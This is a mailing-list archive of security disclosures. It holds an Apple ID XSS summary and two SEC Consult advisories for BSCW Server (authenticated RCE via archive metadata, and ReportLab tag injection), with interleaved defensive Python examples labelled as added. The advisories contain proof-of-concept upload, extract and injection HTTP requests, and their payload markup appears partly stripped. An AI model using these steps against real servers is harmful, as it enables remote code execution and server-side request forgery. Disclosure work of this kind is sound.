[FD] XSS in Apple ID Server idmsa.apple.com

2021-08-27 Thread Zemnmez
Hi seclists! I wanted to try posting some of my research here, and I think
this is the right list.

I recently published some research into Apple ID security that culminated
in an XSS on the Apple ID server -- that is, an attacker can pop out an
Apple login page that autofills your credentials and 2FA :)

In particular, it has several really interesting components in the chain:

- a Content Security Policy injection / bypass to slacken Javascript code
execution and embed restrictions
- bypass to postMessage restrictions on sending and receiving messages that
uses some deep diving into the relevant spec
- several bugs that involve interpretation malleability of URLs

I was surprised to find out that postMessage's 'targetOrigin' parameter
does not, as the spec describes, take a target origin, but actually a
target *URL* which is then *parsed* to extract an origin. This means that,
say 'https://nonsense:morenonse...@apple.com/somepath?nonsense#nonsense' as
a *targetOrigin* will match 'https://apple.com'.

The full write-up can be found here:
https://zemnmez.medium.com/how-to-hack-apple-id-f3cc9b483a41

Thomas

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
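The targetOrigin behaviour described in the post, modelled in Python as an added example (not code from the post or from Apple): origin_of() keeps only scheme, host and port, which is why a URL carrying userinfo, a path, a query and a fragment still matches a bare origin, and is_serialized_origin() is a review-time check for targetOrigin literals. The URLs are constructed, and urllib.parse only approximates the browser's WHATWG URL parser.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url: str) -> str:
    """Serialize the (scheme, host, port) origin of a URL.

    Userinfo, path, query and fragment are discarded, so a targetOrigin such
    as 'https://user:secret@apple.com/somepath?q#frag' (constructed value)
    yields 'https://apple.com'. Note: urllib.parse is not the WHATWG parser.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    if not scheme or not host:
        raise ValueError(f"not a URL with an origin: {url!r}")
    port = parts.port  # raises ValueError on a malformed port
    if port is None or port == DEFAULT_PORTS.get(scheme):
        return f"{scheme}://{host}"
    return f"{scheme}://{host}:{port}"


def target_origin_matches(target_origin: str, recipient_origin: str,
                          sender_origin: str) -> bool:
    """Model the targetOrigin step of postMessage as the HTML spec states it:
    '*' matches any recipient, '/' matches the sender's own origin, and any
    other value is parsed as a URL whose origin must equal the recipient's.
    """
    if target_origin == "*":
        return True
    if target_origin == "/":
        return origin_of(recipient_origin) == origin_of(sender_origin)
    return origin_of(target_origin) == origin_of(recipient_origin)


def is_serialized_origin(value: str) -> bool:
    """Review helper: True only when value is already a bare origin
    (scheme://host[:non-default port]) or one of the two spec keywords,
    so literals that merely parse to an origin can be flagged in review.
    """
    if value in ("*", "/"):
        return True
    try:
        return origin_of(value) == value
    except ValueError:
        return False
```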


[FD] SEC Consult SA-20210827-0 :: Authenticated RCE in BSCW Server

2021-08-27 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20210827-0 >
===
              title: Authenticated RCE
            product: BSCW Server
 vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2
      fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3
         CVE number: CVE-2021-39271
             impact: high
           homepage: https://www.bscw.de/classic/
              found: 2021-06-30
                 by: Armin Stock (Atos Germany)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos company
                     Europe | Asia | North America

                     https://www.sec-consult.com

===

Vendor description:
---
"A versatile system for any field of application

BSCW Classic is in use around the world. With more than 500 functions, it
offers the right solution for every task. Turn your ideas into reality! Our
proven system has been supporting information flow and knowledge management at
numerous companies for more than 20 years."

Source: https://www.bscw.de/en/classic/


Business recommendation:
---
The vendor provides a patched version for the affected products which should
be installed immediately.


Vulnerability overview/description:
---
1) Authenticated RCE
The application allows a user with low privileges to upload different kinds of
archives (`ZIP`, `tar`, `RFC822`) and extract them on the server. During the
extraction process a special file (`.bscw`) is processed to attach metadata to
the files created during extraction. This metadata file contains an attribute
(`class`) which is later used to instantiate a class or call a function that
creates the desired object. As no allow-list limits which class or function may
be named, an arbitrary `Python` function can be called. The function is called
with two parameters, the first of which is controlled by the attacker
(an element from the metadata file: `bscw:name`).
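An allow-listed replacement for the `class` lookup described above, added here as an example rather than the vendor's fix: the dotted name taken from the `.bscw` metadata is resolved through a closed registry, so no import or attribute lookup is driven by user input. The Folder and Document classes and the name `bscw.core.cl_document.Document` are constructed for the example; only `bscw.core.cl_folder.Folder` comes from the advisory.

```python
from dataclasses import dataclass


@dataclass
class Folder:          # stand-in for the real BSCW folder class
    name: str


@dataclass
class Document:        # constructed stand-in, not a BSCW class name
    name: str


# Allow-list: fully-qualified name -> constructor. Anything absent is refused,
# whereas the vulnerable code split the name on '.', imported the module part
# and used whatever getattr() returned.
ARTIFACT_CLASSES = {
    "bscw.core.cl_folder.Folder": Folder,
    "bscw.core.cl_document.Document": Document,   # constructed name
}

# Same default the page's code falls back to on ImportError.
DEFAULT_CLASS = "bscw.core.cl_folder.Folder"


class UnsafeArtifactClass(ValueError):
    """Raised when .bscw metadata names a class outside the allow-list."""


def is_allowed_artifact_class(klass) -> bool:
    """Exact string membership; no normalisation, no partial matches."""
    return isinstance(klass, str) and klass in ARTIFACT_CLASSES


def resolve_artifact_class(klass: str):
    """Return the constructor registered for klass, or raise."""
    if not is_allowed_artifact_class(klass):
        raise UnsafeArtifactClass(f"{klass!r} is not an allowed artifact class")
    return ARTIFACT_CLASSES[klass]


def create_artifact(metadata: dict):
    """Build the artifact for one .bscw entry ('class', 'bscw:name').

    A missing 'class' uses DEFAULT_CLASS; an unknown one is rejected instead
    of being silently defaulted, so the failure is visible in logs.
    """
    constructor = resolve_artifact_class(metadata.get("class", DEFAULT_CLASS))
    return constructor(name=str(metadata.get("bscw:name", "")))
```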


Proof of concept:
---
1) Authenticated RCE
The first step is to create an archive with a malicious `.bscw` file.
$ zip ../data.zip ./.bscw ./*

---

http://bscw.de/bscw/bscwarc.dtd;>
http://bscw.local; timestamp="20210630T123242Z" 
pathsep="\\">
  http://bscw.de/bscw/elements/0.1/doc/; 
xmlns:bscw="http://bscw.de/bscw/elements/0.1/; >

  
  HTML Document
  CONTENT OF FIRST PARAMTER

  

---

Then the archive can be uploaded to a folder (OID: 267) to which the user
has write access:
---
PUT /sec/bscw.cgi/267/data.zip HTTP/1.1
Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/zip
Content-Length: 1559
DNT: 1
Connection: close
Cookie: bscw_auth=""

PK.
---

After uploading the archive, the `extract` operation can be called for the
newly created file object (OID: 1179):
---
GET /sec/bscw.cgi/267?op=extract=267_1179 HTTP/1.1
Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://bscw.local:8080/sec/bscw.cgi/267
Cookie: bscw_auth=""
Upgrade-Insecure-Requests: 1
---

During the extraction the function from the `class` attribute is located
and called.
---
# File: bs_extract.py

def createArtifact(self, request, tree, user, target=None):
    """create artifact for user and add to target
    returns tuple (artifact, oldid) - or (None, None)
    """

    #

    # Locating the class/function
    # klass = metadata 'class' attribute
    klass_tuple = klass.split('.')
    klass_name = klass_tuple[(-1)]
    klass_modul = ('.').join(klass_tuple[:-1])
    try:
        modul = __import__('bscw').module(klass_modul)
    except ImportError as ie:
        log_arc.warning('ImportError: %s ', str(ie))
        klass = 'bscw.core.cl_folder.Folder'
        modul = None

    if modul and hasattr(modul, klass_name):
        cons

[FD] SEC Consult SA-20210827-1 :: XML Tag injection in BSCW Server

2021-08-27 Thread SEC Consult Vulnerability Lab

SEC Consult Vulnerability Lab Security Advisory < 20210827-1 >
===
              title: XML Tag injection
            product: BSCW Server
 vulnerable version: BSCW Server <=5.0.11, <=5.1.9, <=5.2.3, <=7.3.2, <=7.4.2
      fixed version: 5.0.12, 5.1.10, 5.2.4, 7.3.3, 7.4.3
         CVE number: CVE-2021-36359
             impact: high
           homepage: https://www.bscw.de/classic/
              found: 2021-06-30
                 by: Armin Stock (Atos Germany)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos company
                     Europe | Asia | North America

                     https://www.sec-consult.com

===

Vendor description:
---
"A versatile system for any field of application

BSCW Classic is in use around the world. With more than 500 functions, it
offers the right solution for every task. Turn your ideas into reality! Our
proven system has been supporting information flow and knowledge management at
numerous companies for more than 20 years."

Source: https://www.bscw.de/en/classic/


Business recommendation:
---
The vendor provides a patched version for the affected products, which should
be installed immediately.


Vulnerability overview/description:
---
1) XML Tag injection
The application allows a user with low privileges to export different objects
to a `PDF` file (`Send To -> File(PDF)`) via the `exportpdf` package. The
ReportLab framework is used to render the objects' content, and its paragraph
parser interprets a set of markup tags in that content:

---
# File: reportlab/platypus/paraparser.py
 !!! NOTE !!! THIS TEXT IS NOW REPLICATED IN PARAGRAPH.PY !!!
 The ParaFormatter will be able to format the following
 tags:
   < /b > - bold
   < /i > - italics
   < u [color="red"] [width="pts"] [offset="pts"]> < /u > - underline
   width and offset can be empty meaning use existing canvas line width
   or with an f/F suffix regarded as a fraction of the font size
   < strike > < /strike > - strike through has the same parameters as underline
   < super [size="pts"] [rise="pts"]> < /super > - superscript
   < sup ="pts"] [rise="pts"]> < /sup > - superscript
   < sub ="pts"] [rise="pts"]> < /sub > - subscript
   

   < bullet >  - bullet text (at head of para only)
   
   
   link text
   attributes of links
   size/fontSize/uwidth/uoffset=num
   name/face/fontName=name
   fg/textColor/color/ucolor=color
   backcolor/backColor/bgcolor=color
   dest/destination/target/href/link=target
   underline=bool turn on underline
   anchor text
   attributes of anchors
   fontSize=num
   fontName=name
   fg/textColor/color=color
   backcolor/backColor/bgcolor=color
   href=href
   
   
   
   
   width="w%" --> fontSize*w/100   idea from Roberto Alsina
   height="h%" --> linewidth*h/100 
- 
...  turn off word breaking and hyphenation

   The whole may be surrounded by   tags
---

The application does not encode user content before passing it to ReportLab,
which allows the user to inject tags of their own. ReportLab then evaluates
these tags.

Depending on the `ReportLab` version, this allows the user to perform an `SSRF`
(server-side request forgery) attack via the `img` tag
(https://snyk.io/vuln/SNYK-PYTHON-REPORTLAB-1022145).

There are also known vulnerabilities in `ReportLab`:

* https://www.cybersecurity-help.cz/vdb/SB2019101613
* https://hg.reportlab.com/hg-public/reportlab/rev/b117091a73c2

This allows an attacker to execute `Python` code via the `unichar` tag or the
`color` attribute.
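An added example (not BSCW's or ReportLab's code) of the missing encoding step together with a triage helper: paragraph_markup() escapes user content before it reaches ReportLab's paragraph parser, and find_reportlab_tags() lists which ReportLab tags a stored description already contains, which is useful when checking existing folder descriptions after patching. The tag list is assembled from the paraparser docstring quoted above plus the `img`, `font` and `unichar` tags the advisory names, and the sample strings are constructed.

```python
import re
from xml.sax.saxutils import escape

# Tag names ReportLab's paragraph parser acts on: those listed in the quoted
# paraparser docstring plus font/img/unichar named by the advisory. This is a
# triage aid for stored content, not the parser's complete grammar.
REPORTLAB_TAGS = frozenset({
    "b", "i", "u", "strike", "super", "sup", "sub", "bullet", "link", "a",
    "font", "img", "unichar", "para",
})

# Opening, closing or self-closing tag; group 1 is the tag name.
TAG_RE = re.compile(r"<\s*/?\s*([A-Za-z]+)[^>]*>")


def find_reportlab_tags(text: str) -> list:
    """Distinct ReportLab tag names present in text, lowercased, in order of
    first appearance. Non-ReportLab tags are ignored."""
    found = []
    for match in TAG_RE.finditer(text):
        name = match.group(1).lower()
        if name in REPORTLAB_TAGS and name not in found:
            found.append(name)
    return found


def paragraph_markup(user_text: str) -> str:
    """Encode user content so the paragraph parser sees text, not markup.

    '&', '<' and '>' are handled by saxutils.escape; both quote characters are
    added so that content can also sit safely inside an attribute value.
    """
    return escape(user_text, {'"': "&quot;", "'": "&#39;"})


def render_description(description: str) -> str:
    """Fixed, application-chosen markup wrapped around escaped user input.

    Only the application's own <b> tag survives; anything the user typed is
    inert text in the generated PDF.
    """
    return "<b>Description:</b> " + paragraph_markup(description)
```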


Proof of concept:
---
1) XML Tag injection
One possible injection point is the `description` of a folder. Using the
following payload allows the execution of the `Python` code `28+20`.

hello

The result of this code is `48` (ASCII: `0`), which gets written to the
generated `PDF` file.

---
POST /sec/bscw.cgi/1917?op=_editfolder.EditFolder HTTP/1.1
Host: bscw.local:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,